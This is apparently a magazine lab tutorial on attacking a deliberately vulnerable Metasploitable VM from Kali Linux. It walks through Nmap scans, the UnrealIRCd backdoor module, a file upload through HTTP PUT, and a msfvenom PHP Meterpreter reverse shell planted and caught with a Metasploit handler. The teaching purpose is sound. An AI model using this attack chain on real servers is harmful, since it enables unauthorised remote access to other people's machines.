Hack the system
Strike down upon thy hacking sandbox with great vengeance. Wait, what did it ever do to you?
If you followed our handy guide on the previous pages, then you’ll already have augmented your Kali Light installation with Nmap, a portscanning utility par excellence and a vital part of any pen-tester’s arsenal. As mentioned on the DVD page (there will be the standard complement of two next month) it’s possible to ‘upgrade’ this to the full-fat Kali with apt install kali-linux-all , but there’s no way we could provide even the pithiest summary of the 14GB of tooling that command would bestow upon you. If you just want the most popular tools, then apt install kalilinux-top10 will only cost your VM about 600MB. We’re going to play it frugal and only install what we talk about, because that’s how we roll.
For our first trick, we’ll install Rapid7’s Metasploit framework. This is an all-powerful environment that allows you to search, customise and deploy exploits for known vulnerabilities. It’s the recommended platform for attacking the Metasploitable VM and is completely free (a commercial version with a fancy web interface and countless other features is available). Grab it with:
$ sudo apt install metasploit-framework
That command downloaded 750MB of packages on our VM. Before we use it let’s return briefly to Nmap. Just running Nmap with an IP address (as we did in Step 5 of the walkthrough) will scan the most popular 1000 TCP ports (where you’d usually find Web, Telnet, SSH and Windows-file Sharing Services). It’s possible to run any service on any port, so if we want to be thorough we should scan the whole range, which we can do with
$ nmap -p0-65535 10.0.2.4
Changing the IP address to whatever the Metasploitable VM gets assigned in your setup. You should find another couple of services running on ports 3500 and 6697.
A little research will tell you that port 6697 is used by the Unrealirc server. You can confirm this by installing an IRC client such as Hexchat on the Kali VM and connecting to the Metasploitable VM (see image below).
And a little more research (i.e. a Duckduckgo search) will tell you that this is indeed a vulnerable version. Let’s forget that for a second and fire up Metasploit by running msfconsole . We can search for available exploits by typing search unreal . Apart from a buffer overflow in the classic Unreal Tournament 2004, you’ll find a backdoor in our vulnerable daemon. Let us find out about and then load it with:
> info exploit/unix/irc/unreal_ircd_3281_backdoor
> use exploit/unix/irc/unreal_ircd_3281_backdoor
Tab completion works so you only need to type as far as ...irc/ . You’ll need to attach a payload for this to be any use, and we’ll cover doing just that over on the next the page.
You’ll find credentials for the rest of the running services on the Metasploitable wiki page at https:// github.com/rapid7/metasploitable3/wiki/ Vulnerabilities. But that’s slightly cheating – hackers do find passwords lying around often, but sometimes they have to do some work too. So let’s get to work. We know there’s a web server running on the vulnerable machine, and if you visit it you’ll see a directory listing (indicating right away that Apache has been poorly configured) from whence you can find a couple of potentially
vulnerable applications. But what if there was something else going on? Metasploit’s dir_scanner module will search for commonly named directories on a server (which may not show up in directory listings) so let’s see what it has to say. Activate, set up and run the module like so:
> use auxiliary/scanner/http/dir_scanner
> set RHOSTS 10.0.2.4
> run
Apart from the directories we knew about, there are also /cgi-bin /icons and /uploads. The HTTP code 403 shown after the first two indicates they are forbidden, so we can’t do much with them at present. But the uploads/ directory is fair game, you can browse to it and find an empty listing. But if we are lucky perhaps we can upload something to it? Let’s investigate further using Nmap. It ships with a handy script for seeing which HTTP methods are allowed for which directories. Open another terminal and run:
$ nmap –script https-methods –script-args httpmethods.url-path=’/uploads’,http-methods.test-all -p 80 10.0.2.4
Note the script-args argument can’t have (unquoted) spaces in it, so there’s no space between ‘uploads’, and the next argument. You should see the following encouraging line:
Potentially risky methods: DELETE PUT CONNECT
So we can use an HTTP PUT request to deposit potentially any file we like on there. We have discovered a file upload vulnerability, go us! Create a PHP script (on the Kali VM) with:
$ nano info.php
Fill it with the following:
?>
and save (Ctrl-x, Y, Enter) to make a simple PHP script that prints a bunch of information about the server’s PHP config. Let’s see if we can upload this, using another handy Nmap script:
$ nmap –script http-put –script-args http-put.url=’/ uploads/info.php’,http-put.file=’info.php’ -p 80 10.0.2.4
If you see:
| http-put: /uploads/info.php was successfully created
then you can begin to get excited. This excitement may continue when you visit (still from the Kali VM) the URL of our recently implanted file: http://10.0.2.4/ uploads/info.php. Not only can we upload things, so that they are accessible from the outside world, but we can have the web server execute arbitrary PHP scripts. The phpinfo() function reveals lots of juicy info about the server, which could inspire further attacks. But since we know we can run PHP we don’t need much more –
Metasploit can craft us a PHP reverse shell, granting us remote access with the same privilege level as Apache.
A reverse shell allows us to execute commands directly on the server (like a regular shell), but unlike a regular shell it doesn’t listen for incoming connections – it reaches out to you. Metasploit has it’s own reverse shell called Meterpreter, which can be configured and implanted in all kinds of things. We can make a PHP payload using the Msfvenom utility. The lhost argument below refers to the Kali VM this time, rather than the Metasploitable one (which should be 10.0.2.4). You can find this out by running ip a. $ msfvenom -p php/meterpreter/reverse_tcp lhost=10.0.2.15 lport=4444 -f raw > meterpreter.php
This tiny (1K) payload allows us to open up a socket back to our Kali VM, and we’ll configure Metasploit to listen for this in a moment. First we need to plant our file: $ nmap –script http-put –script-args http-put.url=’/ uploads/meterpreter.php’,http-put.file=’meterpreter. php’ -p 80 10.0.2.4
Now we configure Metasploit to listen for any incoming connections: > use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 10.0.2.15
> run
Now return to the /uploads directory listing on the vulnerable VM. You should see meterpreter.php has been successfully uploaded. Click it. Nothing will happen in the web browser, but in Metasploit you should see a
Meterpreter session has been open. We are properly in business now. Lots of the Bash commands you’re familiar with will work here, so you can poke around directories and such. You can also upload and download files, and invoke further Meterpreter mayhem. Type help
for a complete list of commands. If we run:
> getuid
We can see we are indeed running as the www-data
user. Which pretty much gives us free reign over the /var/www directory on the vulnerable host and lets us peruse all but the most sensitive bits of the filesystem (e.g. the /etc/shadow file where password hashes are stored). It would be nice if we could find some kind of privilege escalation that would enable us to get root. But sadly we’re all out of space.
HEAVEN IS A REVERSE SHELL “A reverse shell allows us to execute commands directly on the server, but unlike a regular shell it doesn’t listen for incoming connections – it reaches out to you”